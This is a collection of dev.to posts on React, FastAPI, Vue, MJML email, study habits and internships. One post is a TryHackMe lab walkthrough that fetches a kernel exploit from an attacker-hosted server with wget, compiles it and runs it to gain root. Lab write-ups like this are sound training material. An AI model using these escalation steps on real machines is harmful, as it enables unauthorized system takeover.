ojo_oyenike_2d458c1ededf3
1,906,924
VQC question
We know that the VQC measures all qubits and for binary classification it then performs a parity...
0
2024-06-30T20:47:49
https://dev.to/jasraj_7a6e3c084944dca515/vqc-question-5105
quantumcomputer, quantum, machinelearning, development
We know that the VQC measures all qubits and for binary classification it then performs a parity functions to map the output probabilities to the class labels. But how does the VQC do this if there are more than two labels? The parity function only works for two classes and in the documentation i only found that the VQC uses some kind of Extension of the parity function. But thats it. We have no more information regarding this than „an extension of the parity function“. What is that extension and how does it perform the mapping between the probability vectors and the class labels?
jasraj_7a6e3c084944dca515
1,906,923
Technical Blog Article for HNG
As a backend developer, producing quality code, testing and debugging is one of the important aspect...
0
2024-06-30T20:42:38
https://dev.to/wizleriq/technical-blog-article-for-hng-lid
As a backend developer, producing quality code, testing and debugging is one of the important aspect of the job. Also, problem solving skills is another important aspect in backend development. In this article, I will share a recent difficult backend problem I encountered and how I solved it, I will also talk about why I am enthusiastic about HNG internship. My Challenge: Implementing User Login. I developed an admin dashboard using MongoDB, Express, React and Node.js. I incorporated a login system in my application to allow users register and log into their respective accounts. How I solved it: Database Setup: The first step was to set up a database to store user details with fields for name, username and hashed password for registration. Password hashing was implemented for password security. Password Hashing and Salting: Password Hashing was used to protect user’s password from cybercriminals. In password hashing, the original password or value cannot be recovered which makes it different from encryption where the original value can be retrieved with the correct secrete key used to encrypt the value in the first place. User password were hashed before storing them in the database. Also, I made use of salting which is unique to each password and it’s attached to it before hashing providing extra security. This ensures that even if two users have the same password, their hashed value will be different due to unique salts. Login Endpoint: Login endpoint was created to handle user authentication. When a user submits their login details by clicking on the submit button, the system retrieved the hashed password and salts for the username in the database, hashed the provided password the user sent to the server and compare the retrieved hashed password and provided hash password. If the hash matches, the system authenticates the user. Generating Tokens: I created a JSON Web Token (JWT) when the user logs in/authenticates to maintain user session. The token generated contains user’s information it remains valid for a limited period of time. My Journey with HNG Internship As a backend developer with focus on MERN stack. I love working on backend projects and staying up to date with latest technologies. As I engage in HNG internship, I have full confidence that it will help me upgrade my skills as a backend developer and also collaborate with experienced backend developers to work on real world problem. WHY HNG INTERNSHIP? I’m excited about my internship with HNG because it will help me upgrade my skills as a backend developer and also a valuable addition to my resume thereby giving me an edge in the labour market. https://hng.tech/internship
wizleriq
1,906,922
How to fetch API - React
Using Pokemon api https://pokeapi.co/ How to get all data import { useEffect } from...
0
2024-06-30T20:41:18
https://dev.to/kakimaru/how-to-fetch-api-react-41e5
Using Pokemon api [https://pokeapi.co/](https://pokeapi.co/) # How to get all data ```App.js import { useEffect } from 'react'; import { getAllPokemon } from './utils/pokemon' function App() { const initialURL = `https://pokeapi.co/api/v2/pokemon/`; useEffect(() => { const fetchPokemonData = async function() { let res = await getAllPokemon(initialURL) console.log(res); } fetchPokemonData(); }, []) return ( <div className="App"> </div> ); } ``` ```utils/pokemon.js export const getAllPokemon = function (url) { return new Promise((resolve, reject) => { fetch(url) .then((res) => res.json()) .then((data) => resolve(data)); }); }; ``` ## Read each of data ``` const [pokemonData, setPokemonData] = useState([]) useEffect(() => { const fetchPokemonData = async function() { let res = await getAllPokemon(initialURL) loadPokemon(res.results) // added setLoading(false) } fetchPokemonData(); }, []) ``` ``` const loadPokemon = async function(data) { let _pokemonData = await Promise.all(data.map((item) => { let pokemonRecord = getPokemon(item.url) return pokemonRecord; })) setPokemonData(_pokemonData) } ```
kakimaru
1,906,921
My Journey into Backend Development
I remember after I got my laptop, I dove into backend development immediately. Little did I know that...
0
2024-06-30T20:38:08
https://dev.to/chris_friday_35d646ff4972/my-journey-into-backend-development-1aan
I remember after I got my laptop, I dove into backend development immediately. Little did I know that there were some “interesting” challenges ahead. My name is Chris Friday, and I am a Python programmer and an aspiring Backend engineer. I have been into backend development for almost two months, and I honestly must confess it’s quite amazing and thrilling to make a website come to life with a brilliant use of logic, database manipulations, and all the nitty-gritty of backend stuff. I remember very vividly when I was working on a Trip app project using Django, and I ran into a nasty bug. Believe you me, it wasn’t funny at all. I was working on styling a Django form, but I did not know Tailwind CSS, which was the framework the tutor was using, and I was at a loss on what to do because, without the styling, my form was looking ugly. And yes, I know I’m not a frontend developer, but that doesn’t mean I can’t style my own website, duh! So back to my bug. I searched for a long time on StackOverflow, but I couldn’t get a good answer for my problem. Google search was not helping either, so I decided to go to YouTube, and there I found my salvation. I learned about a module called widget-tweaks that allows me to style my forms with CSS, and that was how I was able to solve that problem. It took me almost the whole day to get that solution; it wasn’t easy at all. Currently, I’m enrolled as an intern at HNG Internship. You can get more information at https://hng.tech/internship or https://hng.tech/hire. At HNG, I hope to become a good backend developer and gain industry experience from working with their senior developers. I’m so excited about this internship because it is an amazing opportunity for me to grow and excel in my career as a backend developer. Hopefully, I’ll get exposed to new concepts, technologies, industry standards, and best practices in the backend space. This internship will surely be a plus for me and my career, as it is highly recommended by some friends of mine in the tech industry. I just can’t wait to begin, and I pray I don’t run into too many “interesting” bugs along the way.
chris_friday_35d646ff4972
1,906,920
EVM Reverse Engineering Challenge 0x01
The idea on this one is quite similar as the previous one, just with slight variation. The contract...
27,871
2024-06-30T20:29:11
https://gealber.com/evm-reverse-challenge-0x01
evm, re, ethereum, smartcontract
The idea on this one is quite similar as the previous one, just with slight variation. The contract address for this challenge is this: ``` 0xA0BEC25Cd1d2b22aa428AbEf23F899506acf9Fff ``` Hint: How much would be 0 - 1 = ?
gealber
1,906,885
Vue.js vs. React.js: Finding Your Frontend Fit
Navigating a large playground of frameworks and tools that all promise to improve user experiences...
0
2024-06-30T20:18:02
https://dev.to/feranmi_estherawolope_35/vuejs-vs-reactjs-finding-your-frontend-fit-12pe
Navigating a large playground of frameworks and tools that all promise to improve user experiences and ease workflow is what frontend development is like. Among them, Vue.js and React.js have become formidable competitors, each with distinct qualities and talents. Now let's explore these powerful tools and see which one will work best for your next project! Vue.js is like the friendly neighbor who welcomes you with open arms into the world of frontend development. Created by Evan You, Vue.js prides itself on being approachable yet powerful, making it an excellent choice for both beginners and seasoned developers alike. Vue.js is an HTML-based template syntax that feels like a logical continuation of conventional web programming, making it simple yet powerful. You'll be very comfortable designing Vue.js components if you're accustomed working with HTML. Component Magic: Vue.js encourages you to conceive in terms of reusable components, much like when building with LEGO blocks. Using a modular approach helps you maintain a clean and manageable codebase while also accelerating development. Fundamentals of Reactivity: Vue.js presents reactivity in a clear and simple way. This reduces the need for manual DOM manipulation and increases efficiency because any modifications you make to your data will immediately update the related sections of your application. Expanding Ecosystem: Vue.js has quickly expanded its ecosystem, even though it is a bit older than React. From state management with Vuex to navigation with Vue Router,here are plenty of tools to extend Vue.js to meet your project's needs. Meanwhile, The creation of Facebook engineers, React.js, is located on the opposite side of the playground. It's altering the way we think about rendering and updating UI components, kind of like the cool kid with the virtual DOM superpower. Virtual DOM Sorcery: The virtual DOM feature of React.js is revolutionary rather than merely a catchphrase. React reduces changes to only what's necessary, resulting in quicker and more effective rendering by cleverly contrasting your UI's virtual representation with the actual DOM. JSX: The Fusion of JavaScript and HTML JSX, whether you like it or not, infuses your components with a novel combination of JavaScript and HTML. This makes it possible to create UIs that are easier to understand and maintain, particularly for complicated applications. Partially focused Architecture: The component-based architecture is promoted by React.js. Code reusability and scalability are encouraged by the fact that each component maintains its state and can be combined with others. Thriving Community: React.js has a strong ecosystem supported by Facebook and a thriving community. Whether you require React or Redux for sophisticated state management Router for seamless navigation, you'll find plenty of battle-tested tools and libraries at your disposal. Deciding between Vue.js and React.js ultimately boils down to your project's specific needs and your team's preferences: For Rapid Prototyping and Ease of Learning: Vue.js shines with its gentle learning curve and straightforward syntax. It's perfect if you want to get up and running quickly or integrate into an existing project seamlessly. When Performance is Paramount: If your application demands lightning-fast updates and optimal performance, React.js’s virtual DOM and efficient rendering pipeline could give you the edge. Community and Support: React.js boasts a larger community and a mature ecosystem, offering extensive resources and third-party tools. Vue.js, while rapidly growing, may offer fewer resources but is catching up fast. Ultimately, with their respective advantages, Vue.js and React.js are both excellent options for frontend development. Whether you prefer the amiable simplicity of Vue.js or the performance of React.js, you're sure to find a framework that improves your frontend and makes your users happy. Have fun with coding! https://hng.tech/internship, https://hng.tech/hire.
feranmi_estherawolope_35
1,906,884
My 111-Day Experience with The Odin Project
On January 22, 2024, I didn’t know how to write a line of code in JavaScript on my own. It was the...
0
2024-06-30T20:17:57
https://codebyblazej.com/posts/the-odin-project-experience/
javascript, beginners, learning, coding
On January 22, 2024, I didn’t know how to write a line of code in JavaScript on my own. It was the day when I started my first lesson of the Foundation course by [The Odin Project](https://www.theodinproject.com/dashboard). This was the best thing I could find on my coding journey. **The Odin Project saved me from tutorial hell**, and all the projects you’ll see below were done on my own without any help from ChatGPT or other tools—just the knowledge I gained from The Odin Project. After exactly **440 hours and 20 minutes** of learning over 111 days, from January 22, 2024, to May 11, 2024, I was able to complete the Foundations course and create the final project on my own, which was a [calculator](https://codebyblazej.com/posts/the-calculator-project/). Here are some additional statistics about the time I spent on this, as I know some people are curious about how long it takes. ![Exact data of the time it took me to finish foundations](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pvu5kpwijyrcqth9pzce.png) ![Github activity](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/x8km4k1sympumpxz6f45.png) How can you copy the process? Let’s dive in. ## Reviewing the Data Let’s start by looking at this data to see how accurate it really is. I learned **every single day for at least one hour**. To calculate the study sessions, I used a [Pomodoro timer](https://www.toptal.com/project-managers/tomato-timer) set for 25 minutes each, with a 5-minute break in between. So, I assume that 2 Pomodoros equal a 1-hour study session. ## Tools I Used for Note-taking What do I use to document everything? [Obsidian notes](https://obsidian.md/). ![My Daily Note Example](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xyxnzzfy6m1by75w28gk.png) I began using it just before starting Odin because I knew this journey would be quite long and I would need some nice notes to store my ideas. Then, actually, for fun, I decided to count all these hours to see how long it would really take. Many people asked, and only a few answered. It seems like most people just don’t bother to count the time, and I don’t blame them. (However, I saw some people claim it took them 3 months, while others needed a year). And I am talking only about the Foundations part here. ## My Study Routine But here’s how I did it, **without skipping a single day, cheating, or omitting any resources**. I read everything, sometimes including additional resources. This, however, depends on the information included or the blog quality. If I like it or see it would benefit me to save it as a bookmark for future use, I read them and save them; if not, I just skip and move further. But I would highly recommend you **always open all additional resource links** and at least poke around. For reference, you can have a look at all the projects I have done so far and get an idea what you will be able to accomplish after Foundation part of The Odin Project: - [RECIPES BOOK](https://codebyblazej.com/odin-recipes/) (yup, it’s ugly but as I remember it was one of the first projects ;) - [LANDING PAGE](https://codebyblazej.com/landing-page/) - [ROCK-PAPER-SCISSORS](https://codebyblazej.com/Rock-Paper-Scissors/) - [ETCH A SKETCH](https://codebyblazej.com/Etch-a-Sketch/) (this one wasn’t easy, believe me!) - [CALCULATOR](https://codebyblazej.com/Calculator-project/) ## Weekdays My daily routine looks like this: I go to work from Monday to Friday, from 7:30 to 16:00. I’m home around 16:30, then I take a shower, eat a quick supper, and usually by 17:00, I’m ready to start. I spend one hour working on my other blogs that are not related to Odin. If sometimes it takes me only 30 minutes, then I start learning Odin at 17:30; if not, then at 18:00. I learn until 19:00 and then work out for about 30 minutes in my room. By 19:30, I go for a walk and come back around 21:00. Sometimes I study for 15-30 minutes more, but not very often So usually, it’s 1 to 1.5 hours a day. I’d like to mention that **I don’t have kids**, so I don’t need to pick them up from school, etc. **I live alone**, which helps me manage distractions and stick to my plan. But even so, one hour is not a lot, and I think that everybody can do it. ![Monday - Friday Schedule](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xfxqlbewfzwlmcmz3583.png) ## Weekends Weekends look a bit different though. I wake up around 6:30, do some stretching, and start working on Odin at 7:00. I am able to complete 4 Pomodoros by 10:00. Then I go tidy up my room, make breakfast, drink coffee, and am back to learning at 11:30. On Saturday, I take a rest from working out and study until 14:00, then go to make dinner. If it’s Sunday, however, I work out from 13:30 to 14:00 and then the rest looks the same as Saturday. After my walk, especially on Saturday, I go get groceries and I’m back home around 17:00, which allows me to do 2-3 more Pomodoros. Altogether, I can complete around 20 Pomodoros during a whole weekend, which is like 10 hours. Sometimes it’s more, sometimes it’s less. If there are any days off, I treat them as if it were a weekend. ![Saturday Schedule](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/d9975h8w1nweztf4qaf1.png) ![Sunday Schedule](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/09gtiwtll25cmytnw954.png) ## The Power of the Pomodoro Technique A big part of my learning process was the Pomodoro Technique I already mentioned. It’s all about working in focused 25-minute bursts, called Pomodoros, with a 5-minute break in between. After four Pomodoros, you get a longer break of 15-30 minutes. This method helps you stay focused and avoid burnout. ![my pomodoros calculator](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6bbjd6jh2qtnc34d36cg.jpg) [Barbara Oakley’s course on Coursera, “Learning How to Learn,”](https://www.coursera.org/learn/learning-how-to-learn) dives into how our brains work when we’re learning. She talks about the Pomodoro Technique as a great way to break study sessions into smaller chunks, making it easier for the brain to process and remember stuff. If you’re curious about the science behind effective learning, you should definitely check out this course. **I think it’s still free**. At least it used to be when I was told about it when I was starting. The Odin Project’s curriculum uses similar principles. They suggest structured study sessions like Pomodoros, which align with proven learning methods. Following their directions and instructions helps you not only learn the material but also **build strong study habits that will benefit you in the long run**. ## Balancing Workouts and Learning If I didn’t work out, I would be able to learn more and faster, especially on weekdays, but it wouldn’t be too healthy, I bet. ## Tips for Staying Focused I also have some tips that worked out for me pretty well. Remember, you are going to face a lot of time fighting procrastination between sessions. It’s very good to: - **Turn on flight mode** on your phone and put the device as far from you as you can. - **Don’t use your phone** during the 5-minute break between Pomodoros. Stretch instead, walk around the room, and look through the window. - If you are tired and feeling sleepy, **get a standing desk** or use drawers or some other furniture. ![My “standing desk”](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/302dme2y2xuelunfys55.jpg) ## Overcoming Challenges There will be days when you are tired or have many negative thoughts running through your head telling you to stop, that it’s not worth it, that you might be too stupid, or that AI will be coding in the future anyway. If all these happen during your Pomodoro sessions, **DON’T WORRY AND DON’T GIVE UP**. I also had loads of these thoughts, and it’s normal. Some days are worse than others, but I noticed that even the days when I was looking at the screen trying to read boring documentation 5 times helped me to at least stay consistent and build a habit. ## Finding Enjoyment in the Process At some point, you will realize that you like the process you are going through (if you haven’t liked it yet), and you will notice that all negative thoughts start to fade away, and your motivation goes up day after day, regardless of the level of difficulty. I wrote more about this in my blog post about [the calculator project](https://codebyblazej.com/posts/the-calculator-project/). Happy learning! What challenges have you faced in your learning journey? Share your best productivity tips in the comments! [Follow me on Twitter](https://x.com/CodeByBlazej) for more tips and insights on coding and productivity.
codebyblazej
1,902,392
Understanding FastAPI: How FastAPI works
At this point we've seen how ASGI servers and our applications talk to each other and how Starllete,...
0
2024-06-30T20:17:10
https://dev.to/ceb10n/understanding-fastapi-how-fastapi-works-37od
python, fastapi, starllete, asgi
At this point we've seen[ how ASGI servers and our applications talk to each other](https://dev.to/ceb10n/understanding-fastapi-the-basics-246j) and how [Starllete, the foundation of FastAPI works](https://dev.to/ceb10n/understanding-fastapi-how-starlette-works-43i1). Now it's time to take a closer look on how [FastAPI](https://fastapi.tiangolo.com/) extends [Starllete](https://www.starlette.io/). ## FastAPI, a Starllete app First of all, to understand how FastAPI works, the are two main sources of information: * [FastAPI's source code](https://github.com/tiangolo/fastapi) * [FastAPI's documentation](https://fastapi.tiangolo.com/) So make sure you clone Sebastián's repository and start looking at it. FastAPI's first entrypoint is `FastAPI` class, that lives under fastapi/applications.py. Since we are studying an ASGI framework, we can expect that FastAPI is a callable that receives `scope`, `receive` and `send`, like any other ASGI app: ```python async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None: if self.root_path: scope["root_path"] = self.root_path await super().__call__(scope, receive, send) ``` We can see that not only FastAPI has a `__call__` function as we expected, but it delegates to Starlette the request. ## Difference between FastAPI and Starlette when initializing If FastAPI extends Starlette, it will likely add some functionality during initialization. When we look at [FastAPI](https://fastapi.tiangolo.com/reference/fastapi/#fastapi.FastAPI)'s `__init__` function, we can see two main things: * It add routes to OpenAPI docs on `setup` function * It sets the `Router` to `APIRouter` `setup` function will add one of the coolest features of FastAPI: It will add a free OpenAPI documentation to our project with [Swagger](https://swagger.io/) and [Redoc](https://redocly.com/redoc). The `APIRouter` will be where all your path operations live. Either you add your route directly with your FastAPI app ou creating an `APIRouter`, all routes will be included in FastAPI's router. In this post we'll take a better look at FastAPI's routers and routes. We'll leave OpenAPI to a next post. ## Request lifecycle ![HTTP Request](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/z83vfznqlsqs9jg0m3jn.png) Since FastAPI is a Starlette app with extra features, we can assume that a request lifecycle using FastAPI will be almost equal to Starlette's request lifecycle. On the [previous post](https://dev.to/ceb10n/understanding-fastapi-how-starlette-works-43i1), we talked about how a request will be handled. The chain of middlewares will be something like: ``` -> ServerErrorMiddleware -> Other Middlewares -> ExceptionMiddleware -> Router ``` When working with FastAPI we can see the it is overriding Starlette's `Router` with it's own `APIRouter`. That said, when can see that FastAPI is still relying on Starlette's lifecycle, but it prefers to handle the requests its own way. So with FastAPI, you'll have: ``` -> FastAPI App -> Starlette's App -> Starlette's ServerErrorMiddleware -> Starlette's ExceptionMiddleware -> FastAPI's APIRouter (and Router, since it don't override Router's __call__) ``` ## FastAPI routers and routes When we are creating a FastAPI app, there are two main ways to add a route: Adding a route directly with FastAPI's instance: ```python app = FastAPI() @app.get("/{name}") async def hi(name: str): return {"hi": name} ``` Or using `APIRouter` that is used typically in larger apps: ```python app = FastAPI() router = APIRouter(prefix="/v1") @router.get("/compliments/{name}") async def hi1(name: str): return {"hi": name} app.include_router(router) ``` Since we are trying to understand how FastAPI works, lets see what is happening when we use `@app.{verb}`: ```python def get( self, path: Annotated[ str, Doc("... # docs here"), ], *, ... # other args here ) -> Callable[[DecoratedCallable], DecoratedCallable]: return self.router.get( path, ... # code continues ) ``` What we can see here is that `FastAPI.{get,put,post,etc}` are simply decorators that will include the path to APIRouter. What about `FastAPI.include_router`? FastAPI's function `include_router` will simply call it's own APIRouter's `include_router`, that basically will iterate through all routes included in your APIRouter and add the route. ```python # FastAPI include_router def include_router( self, router: Annotated[routing.APIRouter, Doc("The `APIRouter` to include.")], *, ... # other args ) -> None: self.router.include_router( router, ... # other args ) # APIRouter include_router def include_router( self, router: Annotated["APIRouter", Doc("The `APIRouter` to include.")], ... # other args ) -> None: for route in router.routes: if isinstance(route, APIRoute): ... # some logic here self.add_api_route( prefix + route.path, route.endpoint, ... # other args ) ``` Looking at `APIRouter.include_router` we can see that it handles other type of routes, like Starlette's routes, `APIWebSocketRoute`, etc... ## And when my route function gets called? When we receive a request, Starlette's Router will be called, since APIRouter don't override `__call__`. If it finds a matching route, it will call the route's handle function. `handle` belongs to `Route` too, since it is not overwritten as well. What `APIRoute` does is setting Route's `app` to Starlette's function `request_response`, receiving `APIRoute`'s `get_route_handler` as a parameter. ```python class APIRoute(routing.Route): def __init__( self, path: str, endpoint: Callable[..., Any], *, ... # other args ) -> None: ... # some logic here self.app = request_response(self.get_route_handler()) ``` `get_route_handler` returns the `get_request_handler` function. It's here that we start to see the "translation" of Starlette's request to a FastAPI route with dependants, pydantic models, etc. It will run the `run_endpoint_function` function. And here is where our route function is being called with all the resolved dependencies, pydantic models, etc. ```python def get_request_handler( ... # args ) -> Callable[[Request], Coroutine[Any, Any, Response]]: # logic here async def app(request: Request) -> Response: response: Union[Response, None] = None async with AsyncExitStack() as file_stack: # logic here errors: List[Any] = [] async with AsyncExitStack() as async_exit_stack: # logic here if not errors: raw_response = await run_endpoint_function( dependant=dependant, values=values, is_coroutine=is_coroutine ) ``` Pretty cool the see how the framework you are using handles your code right? In the next post, we'll take a look where and when FastAPI handles your API documentation.
ceb10n
1,904,473
Utilizing the useEffect Hook for Handling Side Effects
The useEffect hook is a crucial tool in React for managing side effects, i.e., actions that occur...
0
2024-06-30T20:14:43
https://dev.to/gloriasilver/utilizing-the-useeffect-hook-for-handling-side-effects-njb
The `useEffect` hook is a crucial tool in React for managing side effects, i.e., actions that occur outside the scope of a component. Examples of side effects include: - Fetching data - Event listeners - Setting and clearing timers - Updating the DOM By leveraging `useEffect`, we can keep our applications organized, efficient, and easy to maintain. In this article, we'll discuss the best practices for using the `useEffect` hook in our projects. Before we proceed, you need to have a basic understanding of React fundamentals, including: - React components - Basics of react hooks If you need a refresher, check out this article on [FreeCodeCamp. ](https://www.freecodecamp.org/news/learn-react-basics-in-10-minutes/) ###useEffect Syntax The useEffect takes two parameters: 1. A function that handles the side effect logic. 2. An optional dependency array that determines whether the effect should re-render. ``` JavaScript useEffect (()=>{ },[]) ``` **To solidify your knowledge, we will use useEffect to handle a side effect by fetching a list of users data from GitHub.** **Step 1**: Import `useEffect` and `useState` Hook at the top level of your component. ``` JavaScript import React, {useState, useEffect} from "react" ``` `useState` will create a state variable that stores the users’ data. `useEffect` will handle the side effects when fetching the data. **Step 2**: Create a component and declare the `useState`. ``` JavaScript const UseComponent = ()=>{ const [users, setUsers] = useState ([]); return ( <> </> ) } ``` **Step 3**: Create a `url` variable that holds the link to the API ``` JavaScript const url = "https://api.github.com/users"; ``` **Step 4**: Create a `getUser` function to fetch the data. ``` JavaScript const getUser = async()=>{ const response= await fetch(url); const users = await response.json(); setUsers (users); } ``` We used the `async await` method to fetch the data. **response**: This fetches the data from the url variable. **users**: Gets the response variable and changes it to a json. **setUsers**: This function updates the user's state from an empty array to hold the fetched data in the `user`'s variable. **Step 5**: Invoke the `getData` function inside the `useEffect`. ``` JavaScript useEffect (()=>{ getUser(); )} ``` **Step 6**: Add the dependency array. ``` JavaScript useEffect (()=>{ getUser(); ),[]} ``` The dependency array ensures that the function passed i.e `getUsers` only runs once after the initial render. This helps to avoid unnecessary API calls on subsequent renders. **Step 7**: Use the `map` method to display the new data stores in the`user` state. ``` JavaScript const UseComponent = ()=>{ const [users, setUsers] = useState ([]); return ( <> <h2> GitHub Users</h2> <ul> { users.map((githubUsers)=>{ const {id, login, avatar_url, html_url} = githubUsers; return <li key={id} class name="wrapper"> <img src={avatar_url} alt={login} className="image"/> <div className="text"> <h4> {login} </h4> <a href={html_url}/> Profile </a> </div> </li> }) } </ul> </> ) } ``` Using the `map` method, we destructured each data in the `user` state i.e `id`, `login`, `avatar_url`, `html_url` properties and they are assigned to each html tag. This makes the user data fetched from the API display. Notice how we used the `useEffect` hook to handle the side effect of fetching data from an API, and implemented a dependency array to ensure that the API call only executes after the initial render. This optimises the performance and also prevents redundant data fetching. ### Best practices when using useEffect UseEffect is a crucial tool in React applications, and best practices should be followed when using it to avoid slowing down the application's performance and unnecessary re-renders. These include: 1. Always use the dependency array as the second argument in useEffect. The dependency array ensures that the effects only execute when the specified dependencies change, preventing unnecessary re-renders. 2. **Use the clean-up function**: The cleanup function helps remove unnecessary side effects, preventing memory leaks. E.g. Using the cleanup function to clean up a timer like setTimeout or setInterval prevents them from running unnecessarily and avoids memory leaks. 3. **Use multiple useEffect for unrelated logics**: When dealing with multiple unrelated logics, it's essential to use separate useEffect hooks for each logic, making your code more readable, manageable, and easier to understand. E.g 4. **Use useEffect for side effects only**: Avoiding uses such as handling events, rendering components, or initializing state. Reserve `useEffect` for tasks like fetching data, setting timers, or updating the DOM, which has a tangible impact on the component's behaviour. ###Conclusion In this article, we examined the useEffect hook, its purpose, and when to use it. Additionally, we discussed best practices for using the useEffect hook to ensure optimised code in our React application.
gloriasilver
1,906,883
Try Hack Me: Linux PrivEsc Complete Steps
Completing the TryHackMe Linux Privilege Escalation labs on the Jr Penetration Tester path has been...
0
2024-06-30T20:11:31
https://dev.to/micheaol/try-hack-me-linux-privesc-complete-steps-1kp4
tryhack, ctf, cybersecurity
Completing the TryHackMe [Linux Privilege Escalation](https://tryhackme.com/r/room/linprivesc) labs on the Jr Penetration Tester path has been challenging to me. I thought I needed to write about it. Let's get started! I will skip some of the informational part and jump straight to task 5. ###Task 1: Introduction ###Task 2: What is Privilege Escalation? ###Task 3: Enumeration It does not matter how you gain the initial foothold, When you land on your target machine the first thing you want to do is Enumeration. To get the full enumeration steps, head over to TryHackMe [Linux Privilege Escalation](https://tryhackme.com/r/room/linprivesc) labs Now let's dive into the main reason for this article: ###Task 5: Privilege Escalation: Kernel Exploits: This task expects that we escalate our privilege via kernel exploit. ####Steps: 1. Get a foothold into the target system, in this case, we SSH into the target machine from our attack machine with the details provided 2. We are to escalate through kernel exploit, we need to get the kernel of the machine by running the code below: `uname -a` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ommzuob1e73ygllrxe5d.png) 3. Now we have the kernel name, we need to search exploit DB for exploit to use against the victim machine kernel. We are in luck, we found an exploit on exploit DB. In most cases we might have to dig a little more on the internet. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nyqx8g5yhvnirqtejvmr.png) 4. Click Download to download the exploit to your attacker machine ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rsvhmd5beljwsh09n577.png) 6. The next step is to find a way to get the exploit code to the victim machine. I will be doing this with python3 http server. 8. On the attacker's machine, run the code below in the same `dir` you have the file hosted run on port 8080. `python3 -m http.server 8080` 7. Once your server is running on the attacker's machine, on the victim's machine, you will need to get the file with `wget`. Run the command below on the victim's machine: `wget http://<attacker's_IP: <Port>/<file_name>` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1btj8fv33rnjnvqfu98f.png) If we check the `dir` with `ls` I can see the downloaded file in the `dir`. On the victim's machine. 8. After the download, run the command below to compile the `C` file on the victim's machine. `gcc <filename.c> -o <name_want_to_call_the_compiled_file> -w` 9. Then you need to give `writable permission` to the compiled file. If successful, you should see the file name in the `dir`, then run `id` to see current user id: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/w4mv63bbc9v2mu5v7np1.png) You can see that we have the regular user at the moment: 10. Then run the exploit code: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v14u6qe7gl879qmyqsvl.png) Now we are root after we run the exploit code: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7zwpfio6c05l3srw8zdp.png) ##Conclusion This is the end of the first part of this series. Watch out for ###Tasks 6 - 12. I hope this helped someone as this lab really challenged me, but it was so much fun and it felt good to complete it. Anyways, I got through it and now, so have you! It's Michael
micheaol
1,906,881
Types of testing in software development.
In software development, there are various types of test cases to ensure the application works as...
0
2024-06-30T20:06:55
https://dev.to/aman2221/types-of-testing-in-software-development-4ngb
webdev, testing, know, javascript
In software development, there are various types of test cases to ensure the application works as expected and meets all the user/stakeholder requirements. Here are the main types of testing, particularly relevant to Next.js and React.js applications. - **Unit testing:** Unit testing involves testing individual components or functions to check it is working properly. - **Integration testing:** It focuses on testing the interaction of two or multiple components together to ensure they are working as expected. - **End-to-end testing:** End-to-end testing involves testing the application from start to end to make sure all parts of the app work properly together. - **Acceptance testing:**: Acceptance testing makes sure that the application meets all the acceptance criteria/requirements of the users/stakeholders. - **Regression testing:**: It involves re-running the previous tests again to make sure the application works properly after the recent changes. - **Performance testing:** Testing the application in various conditions such as load, stress, and scalability. - **Security testing:** It involves identifying vulnerabilities in the application and ensuring the application is protected against threats and attacks. - **Usability testing:** How easy and user-friendly is the application for end users. - **Compatibility testing:** Testing the application across different devices, browsers, and operating systems to make sure it works correctly for all. Thanks for reading.
aman2221
1,906,790
Legendary Emails in Node js with mjml 📩
Sometimes I receive emails from various companies and start-ups that look very attractive and...
0
2024-06-30T19:55:36
https://dev.to/silentwatcher_95/legendary-emails-in-node-js-with-mjml-4gp9
node, backenddevelopment, tutorial, javascript
Sometimes I receive emails from various companies and start-ups that look very attractive and audience-friendly. 😶‍🌫️ In their emails, they used a unique font along with images and buttons. What stood out the most was how their email format was responsive, adapting well to different devices. After seeing the emails, I decided to send similar emails to users for the store project I was developing 😎 you can check it out if you like from the link below: https://github.com/Silent-Watcher/express-shop Anyway, I stumbled upon a tool called [**MJML**](https://mjml.io) that could be used to implement this feature. As stated in its [documentation](https://documentation.mjml.io/): > MJML is a **markup language** designed to reduce the pain of coding a **responsive** email. As developers, we don't have to be involved in complex responsive email designs but you can spend some time learning the syntax if you’d like. Good news for Node.js developers: MJML is coded in Node.js. However, if you use other languages such as Python, you can utilize the MJML API. For more information, you can refer to this [post](https://medium.com/mjml-making-responsive-email-easy/integrating-mjml-in-your-app-couldnt-get-easier-discover-the-mjml-api-85a364def4b7) on the Medium website To begin, we will need to install two packages: eta and mjml. ```bash bun add eta@latest mjml@latest ``` After that, I created a file named mail.tpl.js where we initialize MJML and ETA to create our email template. ![mjml](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j8q99gjurelj3krx68f1.png) The template I used is the hello world template from the MJML documentation, which looks something like this ![mjml email preview](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5uzmz3jd295x00arcxy4.png) After accessing your email template in HTML format, if you are using **Nodemailer ** for sending emails, you can create a ‘sendmail’ function that can be utilized later in the project To achieve this, I created a file named ‘mailer.js’ and initialized the Nodemailer package: ![Nodemailer](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jpoyvepax5hd6261baea.png) Now, you can utilize this function wherever you wish to send emails. To define your template, simply use the ‘html’ option within the first parameter. ![send mail in node js](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ox2opqwd605ugju2d81x.png) that’s pretty much it. let me know what you think. 🤗
silentwatcher_95